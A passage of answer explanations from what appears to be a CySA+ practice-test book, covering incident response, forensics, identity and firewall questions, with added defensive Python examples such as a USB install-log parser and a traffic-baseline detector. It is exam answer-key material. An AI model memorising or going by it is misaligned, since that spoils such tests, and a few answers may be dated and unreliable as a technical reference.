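>>>  Section start 2017/04/02 04:01:36.500
<<<  Section end 2017/04/02 04:01:37.000
<<<  [Exit status: SUCCESS]
>>>  [Device Install (Hardware initiated) - USB\VID_0951&PID_1666\0015AAAAAAA]
>>>  Section start 2017/04/05 09:15:00.000
<<<  Section end 2017/04/05 09:15:01.000
<<<  [Exit status: SUCCESS]
"""

HEADER_RE = re.compile(r"^>>>\s+\[Device Install \(Hardware initiated\) - (.+)\]\s*$")
START_RE = re.compile(r"^>>>\s+Section start (\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d{3})")
TIME_FMT = "%Y/%m/%d %H:%M:%S.%f"


def parse_setupapi(text):
    """Return a list of {"device": instance_path, "time": datetime} records,
    one per hardware-initiated install section, in file order."""
    records = []
    pending = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            pending = m.group(1)
            continue
        m = START_RE.match(line)
        if m and pending is not None:
            # Times are local system time, as the log writes them.
            records.append({"device": pending,
                            "time": datetime.strptime(m.group(1), TIME_FMT)})
            pending = None
    return records


def first_seen(records):
    """Earliest install time per device instance path."""
    seen = {}
    for r in records:
        if r["device"] not in seen or r["time"] < seen[r["device"]]:
            seen[r["device"]] = r["time"]
    return seen


def vid_pid(device):
    """Extract (vendor id, product id) from a USB\\VID_xxxx&PID_xxxx\\serial path."""
    m = re.search(r"VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})", device)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    for device, when in first_seen(parse_setupapi(SAMPLE_LOG)).items():
        print(when.isoformat(), vid_pid(device), device)
```

The serial in the USB path and the USBSTOR path is the same string, which is how the interface install and the disk install for one stick are tied together when correlating this log with the registry.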


C. The only solution from Lauren’s list that might work is to capture network flows, remove normal traffic, and then analyze what is left. The Storm botnet and other peer-to-peer botnets use rapidly changing control nodes and don’t rely on a consistent, identifiable control infrastructure, which means that traditional methods of detecting beaconing will typically fail. They also use quickly changing infection packages, making signature-based detection unlikely to work. Finally, building a network traffic baseline after an infection will typically make the infection part of the baseline, resulting in failure to detect malicious traffic.


B. Identifying the attacker is typically handled either during the identification stage or as part of the post-incident activities. The IR process typically focuses on capturing data and allowing later analysis to ensure that services are restored.


D. Playbooks describe detailed procedures that help to ensure that organizations and individuals take the right actions during the stress of an incident. Operations guides typically cover normal operational procedures, while an incident response policy describes the high-level organizational direction and authority for incident response. An incident response program might generate a policy and a playbook but would not include the detailed instructions itself.
C. This is a simple representation of a buffer overflow attack. The attacker overflows the buffer, causing the return address to be pointed to malicious code that the attacker placed in memory allocated to the process.


A. Online tools like VirusTotal, MetaScan, and other online malware scanners use multiple antivirus and anti-malware engines to scan files. This means they can quickly identify many malware packages. Static analysis of malware code is rarely quick and requires specialized knowledge to unpack or de-obfuscate the files in many cases. Running strings can be helpful to quickly pick out text if the code is not encoded in a way that prevents it but is not a consistently useful technique. Running local AV or anti-malware can be helpful but has a lower success rate than a multi-engine tool.


D. DiskView provides a GUI-based view of the disk with each cluster marked by the files and directories it contains. du is a command-line disk usage reporting tool that can report on the size of directories and their subdirectories. df is the Linux command-line disk space usage tool, and GraphDisk was made up for this question.


D. Passphrases associated with keys are not kept in the .ssh folder. It does contain the remote hosts that have been connected to, the public keys associated with those hosts, and private keys generated for use connecting to other systems.


D. There are numerous reverse image search tools, including Google’s reverse image search, Tineye, and Bing’s Image Match. John may want to use each of these tools to check for matching images.


C. This image represents an actual situation that involved a severed fiber link. Checking the secondary link would show that traffic failed over to the secondary link after a few minutes of failed connection attempts. This diagram is not sufficient to determine whether Brian has a caching server in place, but normal traffic for streaming services and video conferences wouldn’t work via a cache! If the link had failed and the card or device recovered on the same link, a resumption of normal traffic would appear. PRTG has continued to get small amounts of traffic, indicating that it is still receiving some information.


C. BitLocker keys can be retrieved by analyzing hibernation files or memory dumps or via a FireWire attack for mounted drives. The BitLocker key is not stored in the MBR. After Alex finishes this investigation, he may want to persuade his organization to require BitLocker key escrow to make his job easier in the future.


A. Adam will quickly note that weekends see small drops, but Christmas vacation and summer break both see significant drops in overall traffic. He can use this as a baseline to identify unexpected traffic during those times or to understand what student and faculty behavior means to his organization’s network usage. This detail is not sufficient to determine top talkers, and weekend drops in traffic should be expected, rather than requiring him to look into why having fewer people on campus results in lower usage!


C. Slack space is the space left between the end of a file and the end of a cluster. This space is left open, but attackers can hide data there, and forensic analysts can recover data from this space if larger files were previously stored in the cluster and the space was not overwritten prior to reuse.
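The mechanics of slack space are easiest to see with a model of a single cluster. The following is an added example, not code from the book: it computes the slack a file of a given length leaves in its final cluster, simulates a cluster that held a larger file being reused for a smaller one without the remainder being wiped, and carves the leftover bytes from beyond the new file's end. The cluster size and the file contents are constructed; the model is simplified (some file systems zero part of the slack up to the sector boundary, which this model does not do).

```python
"""Model file slack in a reused cluster (added example, not from the book)."""

CLUSTER = 4096  # constructed: a common default cluster size for NTFS volumes


def slack_bytes(file_len, cluster=CLUSTER):
    """Bytes between the end of a file and the end of its last cluster.
    A file that ends exactly on a cluster boundary has no slack."""
    return (-file_len) % cluster


def overwrite_cluster(old_cluster, new_data):
    """Model a cluster being reallocated to a smaller file: the file system
    writes the new bytes and leaves whatever followed them untouched."""
    if len(old_cluster) != CLUSTER:
        raise ValueError("old_cluster must be exactly one cluster")
    if len(new_data) > CLUSTER:
        raise ValueError("new_data does not fit in one cluster")
    return new_data + old_cluster[len(new_data):]


def carve_slack(cluster, file_len):
    """What a forensic tool reads when it looks past the logical end of file."""
    return cluster[file_len:]


def demo():
    """Constructed scenario: a cluster full of an old export is reused for a
    short note; the old content survives in the note's slack."""
    old_file = b"SSN=123-45-6789;" * (CLUSTER // 16)   # exactly one cluster
    new_file = b"todo list"
    cluster = overwrite_cluster(old_file, new_file)
    slack = carve_slack(cluster, len(new_file))
    return {
        "slack_len": len(slack),
        "expected_slack": slack_bytes(len(new_file)),
        "old_data_recoverable": b"SSN=" in slack,
        "new_file_intact": cluster[: len(new_file)] == new_file,
    }


if __name__ == "__main__":
    print(demo())
```

The same arithmetic explains why forensic imaging copies whole clusters (or the whole device) rather than files: a file-level copy never reads the slack at all.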
C. The process details are provided using the p flag, while the e flag will show extended information that includes the username and inode of the process. The -t flag shows only TCP connections, -s shows summary information, -a shows all sockets, and the -n flag shows numeric IPs, which is faster than reverse DNS queries.


B. If the system contains any shutdown scripts or if there are temporary files that would be deleted at shutdown, simply pulling the power cable will leave these files in place for forensic analysis. Pulling the cord will not create a memory or crash dump, and memory-resident malware will be lost at power-off.


C. If a device is powered on, the SIM should not be removed until after logical collection has occurred. Once logical collection has occurred, the device should be turned off, and then the SIM card can be removed. If this were not an iPhone, Amanda might want to check to ensure that the device is not a dual or multi-SIM device.


C. Of the tools listed, only OpenVAS is a full system vulnerability scanner. Wapiti is a web application scanner, ZAP is an attack proxy used for testing web applications, and nmap is a port scanner.


B. The containment stage of incident response is aimed at limiting damage and preventing any further damage from occurring. This may help stop data exfiltration, but the broader goal is to prevent all types of damage, including further exploits or compromises.


B. Logical copies of data and volumes from an unlocked or decrypted device are the most likely mobile forensic scenario in many cases. Most forensic examiners do not have access to chip-level forensic capabilities that physically remove flash memory from the circuit board, and JTAG-level acquisition may involve invasive acquisition techniques like directly connecting to chips on a circuit board.


D. While the registry contains the account creation date and time as well as the last login date and time, it does not contain the time the user first logged in. Fortunately for Angela, the SAM also contains password expiration information, user account type, the username, full name, user’s password hint, when the password must be reset and when it will fail, as well as if a password is required. The SAM does not include the number of logins for a user, but some of this detail may be available in the system logs.


B. Advanced persistent threats often leverage email, phishing, or a vulnerability to access systems and insert malware. Once they have gained a foothold, APT threats typically work to gain access to more systems with greater privileges. They gather data and information and then exfiltrate that information while working to hide their activities and maintain long-term access. DDoS attacks, worms, and encryption-based extortion are not typical APT behaviors.


A. Alice is performing an information impact analysis. This involves determining what data was accessed, if it was exfiltrated, and what impact that loss might have. An economic impact analysis looks at the financial impact of an event, downtime analysis reviews the time that services and systems will be down, and recovery time analysis estimates the time to return to service.
D. The process flow that Angela has discovered is typically used by an advanced persistent threat. Phishing would focus on gaining credentials, whaling is similar but focused on important individuals, and a zero-day exploit leverages a newly discovered vulnerability before there is a patch or general awareness of the issue.


B. She is in the identification phase, which involves identifying systems and data before they are collected and preserved.


C. Angela should notify counsel and provide information about the policy and schedule that resulted in the data being removed. This will allow counsel to choose what steps to take next.


C. With most e-discovery cases, reviewing the large volumes of data to ensure that only needed data is presented and that all necessary data is made available takes up the most staff time. Many organizations with larger e-discovery needs either dedicate staff or outsource efforts like this.


C. Cassandra should ensure that she has at least one USB multi-interface drive adapter that can connect to both IDE and SATA drives. While most modern drives use a SATA interface, analysts still periodically encounter older IDE drives. If she was performing forensic analysis, she would also want to use either a hardware or a software write blocker to ensure that she retains forensic integrity of the acquisition. A USB-C cable and a USB hard drive are commonly found in forensic and incident response toolkits, but won’t help Cassandra connect to bare drives.


B. Crime scene tape isn’t a typical part of a forensic kit if you aren’t a law enforcement forensic analyst or officer. Some businesses may use seals or other indicators to discourage interference with investigations. Write blockers, label makers, and decryption tools are all commonly found in forensic kits used by both commercial and law enforcement staff.


B. A call list provides a list of the personnel who should or can be contacted during an incident or response scenario. Sometimes called an escalation list, they typically include the names of the staff members who should be called if there is no response. A rotation list or call rotation is used to distribute workload amongst a team, typically by placing a specific person on-call for a set timeframe. This may help decide who is on the call list at any given point in time. A triage triangle is made up for this question, and responsibility matrices are sometimes created to explain who is responsible for what system or application, but aren’t directly used for emergency contact lists.


A. John the Ripper is a common Linux password cracker. While it is possible that an attacker might choose to call a rootkit or a malicious program used for privilege escalation “john,” it is far less likely. Since user processes are identified by the binary name, not the user’s identity for the process, a user named John won’t result in a process named John unless they create a binary with the same name.


A. Post-incident communication often involves marketing and public relations staff who focus on consumer sentiment and improving the organization’s image, while legal often reviews statements to limit liability or other issues. Developers are typically not directly involved in post-incident communications, and are instead working on ensuring the security of the applications or systems they are responsible for.
209. A. Malicious sites may run scripts intended to mine cryptocurrency or to perform other actions when they are visited or ads execute code, resulting in high processor consumption. Charles should review the sites that were visited and check them against a trusted site list tool or a reputation tool. The scenario described does not indicate that checking the binary will help, and reinstalling a browser isn’t typically part of the response for high CPU usage. Disabling TLS is a terrible idea, and modern CPUs shouldn’t have an issue handling secure sites.


210. B. Lauren’s organization should use a change management process to avoid unauthorized changes to their web server. Lauren could then check the change process logs or audit trail to determine who made the change and when. If Java had been installed without proper authorization, then this would be unauthorized software. Unexpected input often occurs when web applications are attacked, and may result in a memory overflow.


C. Overflowing a memory location by placing a string longer than the program expects into a variable is a form of buffer overflow attack. Attackers may choose to use a string of the same letters to make the overflow easier to spot when testing the exploit. Note that what the CySA+ exam calls memory overflows are more often called buffer overflows, and these terms may be used interchangeably in other materials you may encounter.


B. Catherine can configure a behavior-based analysis tool which can capture and analyze normal behavior for her application, then alert her when unexpected behavior occurs. While this requires initial setup, it requires less long-term work than constant manual monitoring, and unlike signature-based or log-analysis-based tools, it will typically handle unexpected outputs appropriately.
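Three explanations in this chapter rest on the same idea: profiling normal behavior into a baseline and alerting on deviation (the SIEM profiling answer near the start of the chapter, Adam's campus traffic baseline with its expected weekend drops, and Catherine's behavior-based tool here). The following is an added example, not code from the book, serving all three: it builds a per-bucket baseline (weekday versus weekend, chosen because that is the pattern Adam's answer describes) from a constructed week of hourly outbound-traffic samples, then scores new observations as z-scores against the matching bucket. The sample values, the bucket scheme and the threshold are this example's own assumptions.

```python
"""Baseline-and-deviation detection (added example, not from the book)."""
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: (timestamp, outbound KB per hour) for one quiet week.
# 2017-04-01 was a Saturday, so the first four samples are weekend traffic.
BASELINE_SAMPLES = [
    (datetime(2017, 4, 1, 10), 280), (datetime(2017, 4, 1, 14), 340),
    (datetime(2017, 4, 2, 10), 300), (datetime(2017, 4, 2, 14), 320),
    (datetime(2017, 4, 3, 10), 980), (datetime(2017, 4, 3, 14), 1010),
    (datetime(2017, 4, 4, 10), 1000), (datetime(2017, 4, 4, 14), 1020),
    (datetime(2017, 4, 5, 10), 990), (datetime(2017, 4, 5, 14), 1005),
    (datetime(2017, 4, 6, 10), 995), (datetime(2017, 4, 6, 14), 1000),
]


def bucket(ts):
    """Profile weekends separately so a normal weekend drop is not an alert."""
    return "weekend" if ts.weekday() >= 5 else "weekday"


def build_baseline(samples):
    """Per-bucket (mean, population stddev) of the observed values."""
    groups = {}
    for ts, value in samples:
        groups.setdefault(bucket(ts), []).append(value)
    return {name: (mean(vals), pstdev(vals)) for name, vals in groups.items()}


def zscore(baseline, ts, value, min_std=1.0):
    """Standard deviations from the bucket mean; min_std guards against a
    baseline with no variance, which would otherwise flag everything."""
    m, s = baseline[bucket(ts)]
    return (value - m) / max(s, min_std)


def is_anomalous(baseline, ts, value, threshold=3.0):
    return abs(zscore(baseline, ts, value)) > threshold


def scan(baseline, observations, threshold=3.0):
    """Return the observations that deviate from their bucket's profile.
    Note the caveat from the Storm botnet answer: if `baseline` was built after
    an infection, the infection's traffic is part of 'normal' and is not flagged."""
    return [(ts, v) for ts, v in observations if is_anomalous(baseline, ts, v, threshold)]


if __name__ == "__main__":
    bl = build_baseline(BASELINE_SAMPLES)
    new = [(datetime(2017, 4, 8, 11), 350),    # Saturday, normal weekend level
           (datetime(2017, 4, 9, 11), 900),    # Sunday at weekday volume
           (datetime(2017, 4, 10, 11), 5000)]  # Monday, far above profile
    for ts, v in scan(bl, new):
        print("ALERT", ts.isoformat(), v, round(zscore(bl, ts, v), 1))
```

The two behaviors the book contrasts show up directly: the tool needs an initial baseline (setup cost), and after that it flags the Sunday-at-weekday-volume case that a fixed threshold tuned for weekdays would miss.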


Chapter 4: Domain 4: Security Architecture and Tool Sets


1. A. Pair programming is a real-time technique that places two developers at a workstation where one reviews the code that the other writes in real-time. Pass-around reviews, tool-assisted reviews, and formal code reviews are asynchronous processes.


C. The processes consuming the most memory on this server are the SQL Server core process and the SQL Server Management Studio application. These are all components of the database service.


B. The strategy outlined by Jean is one of network segmentation—placing separate functions on separate networks. She is explicitly not interconnecting the two networks. VPNs and VLANs are also technologies that could assist with the goal of protecting sensitive information, but they use shared hardware and would not necessarily achieve the level of isolation that Jean requires.


A. This is an ICMP Echo Reply packet, which is a response to a ping request. If Norm sees a response to a ping, that means the basic connectivity between the two systems is functioning properly.
C. The primary control used to limit the length of exposure of compromised passwords is a password expiration policy. This policy would force a password change at a defined interval and would either lock out the intruder (if the legitimate user changes the password) or alert the legitimate user to the compromise (if the intruder changes the password). Password history would arguably prevent the future reuse of a compromised password, but this is not as direct a control for the given scenario as password expiration. Password length and complexity requirements are designed to prevent the compromise of a password and are not effective controls once the password has already been compromised.


C. Angela should not select the password and security questions option since they are both examples of knowledge-based factors. Each of the other answers includes different factors, providing a greater level of security.


D. OAuth redirects are an authentication attack that allows an attacker to impersonate another user.


B. The identity provider (IDP) provides the authentication in a SAML-based authentication flow. A service provider (SP) provides services to a user, while the user is typically the principal. A relying party (RP) leverages an IDP to provide authentication services.


B. The most practical approach is for Daniel to implement two-factor authentication on the account and retain the approval device himself. This allows him to approve each request but does not require modifying or re-creating the account for each use. The approach where the consultant must advise Daniel before using the account does not meet the requirement of Daniel approving each use.


B. TippingPoint is an intrusion prevention system. Cisco’s NGFW, Palo Alto’s NGFW, and CheckPoint’s appliances are all firewall solutions.


B. The internal network is the most appropriate zone for this server, as it serves only internal clients on the data science team. Adding an additional network for this server is costly, and there is no indication that the effort and expense would be justified. A database server should never be placed on the Internet, and there is no public access required, which would justify placing it in the DMZ.


C. The dual firewall approach allows an organization to achieve hardware diversity by using firewalls from different vendors. This approach typically increases, rather than decreases, both the cost and complexity of administration. There is no indication that the proposed design would increase redundancy over the existing environment.


B. Disposition is a separate SDLC phase that is designed to ensure that data is properly purged at the end of an application life cycle. Operations and maintenance activities include ongoing vulnerability scans, patching, and regression testing after upgrades.


B. Internal audit provides the ability to perform the investigation with internal resources, which typically reduces cost. External auditors would normally be quite expensive and bring a degree of independence that is unnecessary for an internal investigation. The IT manager would not be a good candidate for performing the assessment because he may be involved in the embezzlement or may have close relationships with the affected employees. There is no need to bring in law enforcement at this point, opening the company to unnecessary scrutiny and potential business disruption.
B. The Gramm-Leach-Bliley Act (GLBA) includes regulations covering the cybersecurity programs at financial institutions, including banks. The Health Insurance Portability and Accountability Act (HIPAA) covers healthcare providers, insurers, and health information clearinghouses. The Family Educational Rights and Privacy Act (FERPA) applies to educational institutions. The Sarbanes-Oxley Act (SOX) applies to publicly traded companies.


C. The Gramm-Leach-Bliley Act (GLBA) includes regulations covering the cybersecurity programs at financial institutions, including banks. The Health Insurance Portability and Accountability Act (HIPAA) covers healthcare providers, insurers, and health information clearinghouses. The Family Educational Rights and Privacy Act (FERPA) applies to educational institutions. The Sarbanes-Oxley Act (SOX) applies to publicly traded companies.


D. Visitor log reviews are a procedural mechanism that an organization follows to implement sound security management practices and, therefore, are an example of an administrative control. The other controls listed are all examples of physical security controls.


B. The ITIL framework places security management into the service design core activity. The other processes in service design are design coordination, service catalog management, service-level management, availability management, capacity management, IT service continuity management, and supplier management.


D. Query parameterization, input validation, and data encoding are all ways to prevent the database from receiving user-supplied input that injects unwanted commands into a SQL query. Logging and intrusion detection are important controls, but they would detect, rather than prevent, a SQL injection attack.


D. The Follow option will allow Alec to follow the TCP stream, reassembling the payloads from all of the packets in the stream in an easy-to-view manner.


C. Changes in team members may cause someone to initiate a review, but it is more likely that a review would be initiated based upon changes in the processes protected by the security program, control requirements (such as compliance obligations), or a control failure (such as a security incident).


C. Bollards are physical barriers designed to prevent vehicles from crossing into an area. Mantraps are designed to prevent piggybacking by individuals and would not stop a vehicle. Security guards and intrusion alarms may detect an intruder but would not be able to stop a moving vehicle.


C. ISO 27001 is the current standard governing cybersecurity requirements. ISO 9000 is a series of quality management standards. ISO 17799 covered information security issues but is outdated and has been withdrawn. ISO 30170 covers the Ruby programming language.


C. All of these controls would be effective ways to prevent the loss of information. However, only a background investigation is likely to uncover information that might make a potential employee susceptible to blackmail.


B. All of the controls listed are network security controls. Of those listed, a data loss prevention system is specifically designed for the purpose of identifying and blocking the exfiltration of sensitive information and would be the best control to meet Martin’s goal. Intrusion prevention systems may be able to perform this function on a limited basis, but it is not their intent. Intrusion detection systems are even more limited in that they are detective controls only and would not prevent the exfiltration of information. Firewalls are not designed to serve this purpose.


A. Full disk encryption prevents anyone who gains possession of a device from accessing the data it contains, making it an ideal control to meet Martin’s goal. Strong passwords may be bypassed by directly accessing the disk. Cable locks are not effective for devices used by travelers. Intrusion prevention systems are technical controls that would not affect someone who gained physical access to a device.


B. The primary risk to Nadine’s organization from this attack is that if the password hashes are reversed, accounts may be compromised on Nadine’s site because users commonly use the same passwords on multiple sites.


A. LDAP directory servers, provisioning engines, and auditing systems are all typically considered part of an identity management infrastructure. HR systems are generally considered a data source for the identity management infrastructure but not a component of the infrastructure itself.


C. There is no explicit security domain in the COBIT standard. The four COBIT domains are Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and Evaluate.


C. NT LAN Manager (NTLM) version 1 contains serious vulnerabilities and exposes hashed passwords to compromise. LDAPS is an encrypted, secure version of the Lightweight Directory Access Protocol (LDAP). Active Directory Federation Services (ADFS) and Kerberos are both secure components of Active Directory.


B. Fuzz testing works by dynamically manipulating input to an application in an effort to induce a flaw. This technique is useful in detecting places where an application does not perform proper input validation.


A. The situation where a user retains unnecessary permissions from a previous role is 
known as privilege creep. Privilege creep is a violation of the principle of least privilege 
(rather than an example of least privilege) and may also be a violation of separation of 
duties, depending upon the specific privileges involved. Security through obscurity occurs 
when the security of a control depends upon the secrecy of its details, which is not the 
case in this example. 


B. Patches should be applied in test environments prior to deploying them in production. 
It is best practice to apply security patches as soon as possible and test them thoroughly. 
Patches should also be applied through the organization’s normal change management 
process. 


A. The use of very long query strings points to a buffer overflow attack that was used 
to compromise a local application to perform privilege escalation. The use of the sudo 
command confirms the elevated privileges after the buffer overflow attack. Phishing, 
social engineering, and session hijacking are all possible ways that the attacker compro- 
mised the janitor’s account originally, but there is no evidence pointing at any of these 
in particular. 


A. Network firewalls are not likely to be effective against social engineering attacks 
because they are designed to allow legitimate traffic, and attackers waging social engineer- 
ing attacks typically steal the credentials of legitimate users who would have authorized 
access through the firewall. Multifactor authentication is an effective defense because it 
requires an additional layer of authentication on top of passwords, which may be stolen 
in social engineering. Security awareness raises social engineering in users’ consciousness 
and makes them less susceptible to attack. Content filtering may block phishing messages 
from entering the organization and may block users from accessing phishing websites. 


C. The classification levels under the U.S. government information classification scheme 
are, in ascending order, Confidential, Secret, and Top Secret. Private is not a government 
classification. 


D. The Open Web Application Security Project (OWASP) provides developer-friendly 
descriptions of the top web application security issues. The Common Vulnerability Enu- 
meration (CVE), Common Platform Enumeration (CPE), and Common Configuration 
Enumeration (CCE) tools provide a taxonomy for describing vulnerabilities, platforms, 
and configurations, but they are not educational tools and do not focus on web applica- 
tion security. 


D. By default, nmap scans all of the low-numbered ports (1-1024) and those that are 
specifically listed in the nmap-services file. 


A. PCI DSS has a fairly short minimum password length requirement. Requirement 8.2.3 
states that passwords must be a minimum of seven characters long and must include a 
mixture of alphabetic and numeric characters. 


D. Mandatory vacations are designed to force individuals to take time away from the 
office to allow fraudulent activity to come to light in their absence. The other controls 
listed here (separation of duties, least privilege, and dual control) are all designed to 
prevent, rather than detect, fraud. 


C. The most likely reason that an employee would be storing cookies is to use the session 
IDs stored in those cookies to engage in a session hijacking attack, allowing him to imper- 
sonate the user and conduct financial transactions. 


B. This situation violates the principle of separation of duties. The company appears to 
have designed the controls to separate the creation of vendors from the issuance of pay- 
ments, which is a good fraud-reduction practice. However, the fact that they are cross- 
trained to back each other up means that they have the permissions assigned to violate 
this principle. 


B. All of the technologies listed in this question may be used during the evidence collec- 
tion and production process. However, the hash function is the only component that may 
be used to demonstrate the integrity of the evidence that Arnie collected. 


A. The Data Encryption Standard (DES) is an outdated encryption algorithm that should 
not be used for secure applications. The Advanced Encryption Standard (AES), Rivest- 
Shamir-Adleman (RSA), and Elliptic Curve Cryptosystem (ECC) are all secure alternatives. 


A. Tammy can correlate the results of vulnerability scans with her IPS alerts to deter- 
mine whether the systems targeted in attacks against her network are vulnerable to the 
attempted exploits. IDS logs would contain redundant, rather than correlated, informa- 
tion. Firewall rules and port scans may provide some useful information when correlated 
with IPS alerts, but the results of vulnerability scans would provide similar information 
enhanced with the actual vulnerabilities on particular systems. 


C. In the SABSA model, the Designer’s view corresponds to the logical security architec- 
ture layer. The Builder’s view corresponds to the physical security architecture. The Archi- 
tect’s view corresponds to the conceptual security architecture layer. The Tradesman’s 
view corresponds to the component security architecture layer. 


A. Automated deprovisioning ties user account removal to human resources systems. 
Once a user is terminated in the human resources system, the identity and access manage- 
ment infrastructure automatically removes the account. Quarterly user access reviews may 
identify accounts that should have been disabled, but they would take a long time to do 
so, so they are not the best solution to the problem. Separation of duties and two-person 
control are designed to limit the authority of a user account and would not remove access. 


C. Annual reviews of security policies are an industry standard and are sufficient unless 
there are special circumstances, such as a new policy or major changes in the environ- 
ment. Monthly or quarterly reviews would occur too frequently, while waiting five years 
for the review is likely to miss important changes in the environment. 


C. The image is a dashboard from AlienVault, a security information and event manage- 
ment (SIEM) solution. SIEMs correlate security information gathered from other sources 
and provide a centralized analysis interface. 


B. This scenario has all of the hallmarks of a cross-site scripting attack. The most likely 
case is that the site allows users to post messages containing HTML code and that it does 
not perform input validation to remove scripts from that code. The attacker is likely using 
a script to create a pop-up window that collects passwords and then using that informa- 
tion to compromise accounts. 


A. The only error in this rule is the protocol. SMTP does run on port 25, and inbound 
connections should be accepted from any port and IP address. The destination IP address 
(10.15.1.1) is correct. However, SMTP uses the TCP transport protocol, not UDP. 


B. Travis can correct this error by switching the positions of rules 2 and 3. Rule 3, which 
permits access from the 10.20.0.0/16 subnet, will never be triggered because any traffic 
from that subnet also matches rule 2, which blocks it. 
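
As an added example (not from the book), the following constructed rule base reproduces the error described above: top-down, first-match evaluation shows why rule 3 never fires, a shadow check reports it, and swapping rules 2 and 3 clears it. The rule contents are assumptions, since the question's table is not reproduced here; rule 4 is modelled on the SSH rule discussed in the next answer.

```python
"""Constructed example: first-match firewall evaluation and shadowed-rule
detection. The rule base is hypothetical (the question's table is not on
this page); only the rule 2 / rule 3 relationship follows the answer text."""
import ipaddress
from dataclasses import dataclass, replace
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    number: int
    action: str            # "permit" or "deny"
    source: str            # source network, CIDR notation
    dest: str              # destination network, CIDR notation
    port: Optional[int]    # destination TCP port; None means any port

    def matches(self, src_ip: str, dst_ip: str, port: int) -> bool:
        return (ipaddress.ip_address(src_ip) in ipaddress.ip_network(self.source)
                and ipaddress.ip_address(dst_ip) in ipaddress.ip_network(self.dest)
                and (self.port is None or self.port == port))


def covers(earlier: Rule, later: Rule) -> bool:
    """True if every packet that matches `later` also matches `earlier`."""
    return (ipaddress.ip_network(later.source).subnet_of(ipaddress.ip_network(earlier.source))
            and ipaddress.ip_network(later.dest).subnet_of(ipaddress.ip_network(earlier.dest))
            and (earlier.port is None or earlier.port == later.port))


def first_match(rules: List[Rule], src_ip: str, dst_ip: str, port: int) -> Optional[Rule]:
    """Top-down, first-match evaluation; None means no rule matched."""
    for rule in rules:
        if rule.matches(src_ip, dst_ip, port):
            return rule
    return None


def shadowed_rules(rules: List[Rule]) -> List[Tuple[int, int]]:
    """Return (shadowed rule number, shadowing rule number) pairs.

    A rule is shadowed when an earlier rule covers all of its traffic, so the
    later rule can never be the first match regardless of its action."""
    found = []
    for i, later in enumerate(rules):
        for earlier in rules[:i]:
            if covers(earlier, later):
                found.append((later.number, earlier.number))
                break
    return found


def swap_positions(rules: List[Rule], a: int, b: int) -> List[Rule]:
    """Swap the rules numbered a and b, then renumber by new position."""
    by_number = {r.number: r for r in rules}
    order = [r.number for r in rules]
    ia, ib = order.index(a), order.index(b)
    order[ia], order[ib] = order[ib], order[ia]
    return [replace(by_number[n], number=i + 1) for i, n in enumerate(order)]


# Hypothetical rule base containing the ordering error described in the answer.
RULES = [
    Rule(1, "permit", "0.0.0.0/0",    "10.15.1.1/32", 25),    # inbound SMTP
    Rule(2, "deny",   "10.0.0.0/8",   "10.15.1.0/24", None),  # blocks all 10.x sources
    Rule(3, "permit", "10.20.0.0/16", "10.15.1.0/24", None),  # never reached: covered by rule 2
    Rule(4, "permit", "0.0.0.0/0",    "10.15.1.3/32", 22),    # external SSH to 10.15.1.3
]

# Travis's fix: rule 3 moves above the deny, so the permit can match first.
FIXED = swap_positions(RULES, 2, 3)

if __name__ == "__main__":
    print("shadowed before fix:", shadowed_rules(RULES))   # [(3, 2)]
    print("shadowed after fix: ", shadowed_rules(FIXED))   # []
    hit = first_match(FIXED, "10.20.5.5", "10.15.1.3", 443)
    print("10.20.5.5 -> 10.15.1.3:443 now hits rule", hit.number, hit.action)
```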


D. Rule 4 is correctly designed to allow SSH access from external networks to the server 
located at 10.15.1.3. The error is not with the firewall rulebase, and Travis should search 
for other causes. 


A. Managed security service providers (MSSPs) provide security as a service (SECaaS). 
The infrastructure as a service (IaaS), platform as a service (PaaS), and software as a ser- 
vice (SaaS) offerings do not include the managed security offering that Carl seeks. 


D. It is sometimes difficult to distinguish between cases of least privilege, separation of 
duties, and dual control. Least privilege means that an employee should only have the 
access rights necessary to perform their job. That is not the case in this scenario because 
accountants need to be able to approve payments. Separation of duties occurs when the 
same employee does not have permission to perform two different actions that, when 
combined, could undermine security. That is not the case here because both employees 
are performing the same action: approving the payment. Dual control occurs when two 
employees must jointly authorize the same action. That is the case in this scenario. Secu- 
rity through obscurity occurs when the security of a control depends upon the secrecy of 
its mechanism. 


B. Load testing, also known as stress testing, places an application under a high load 
using simulated users. This type of testing would most closely approximate the type of 
activity that might occur during a denial-of-service attack. 


B. Burp is a web interception proxy, not an intrusion prevention system. Snort, Source- 
fire, and Bro are all intrusion detection and prevention systems. 


A. The ESTABLISHED status message indicates that a connection is active between two 
systems. LISTENING indicates that a system is waiting for a connection. LAST_ACK and 
CLOSE_WAIT are two status messages that appear in different stages of closing a connec- 
tion. 


A. These results show an active network path between Greg’s system and the CompTIA 
web server. The asterisks in the intermediate results do not indicate a network failure but 
are a common occurrence when intermediate nodes are not configured to respond to 
traceroute requests. 


B. The certificate issuer is responsible for signing the digital certificate. In this case, the 
issuer, as shown in the certificate, is Amazon. Starfield Services is the root CA, meaning 
that it issued the certificate to Amazon and allows it to issue certificates to end users. 
nd.edu is the subject of the certificate, while RSA is an encryption algorithm used in the 
certificate. 


C. This is a wildcard certificate, meaning that it is valid for the subject domain (nd.edu) 
as well as any subdomains of that domain (e.g., www.nd.edu). It would not, however, be 
valid for subsubdomains. A wildcard certificate for *.business.nd.edu would cover 
www.business.nd.edu. 


A. The purpose of a digital certificate is to provide the subject’s public key to the world. 
In this case, the subject is the nd.edu website (as well as subdomains of nd.edu), and the 
certificate presents that site’s public key. 


D. TLS uses public key cryptography to initiate an encrypted connection but then 
switches to symmetric cryptography for the communication that takes place during the 
session. The key used for this communication is known as the session key or the 
ephemeral key. 


D. The symmetric algorithm used to communicate between the client and server is negoti- 
ated during the TLS session establishment. This information is not contained in the digital 
certificate. 


A. Group Policy objects (GPOs) are used to enforce security and configuration require- 
ments within Active Directory. Active Directory forests and organizational units (OUs) 
are designed to organize systems and users hierarchically and do not directly allow 
security configurations, although GPOs may be applied to them. Domain controllers 
(DCs) are the servers that are responsible for providing Active Directory services to the 
organization and would be the point for applying and enforcing the GPO. 


A. Succession planning is designed to create a pool of reserve candidates ready to step 
into positions when a vacancy occurs. This is an important continuity control. The other 
security controls may have the incidental side effect of exposing employees to other 
responsibilities, but they are not designed to meet this goal. 


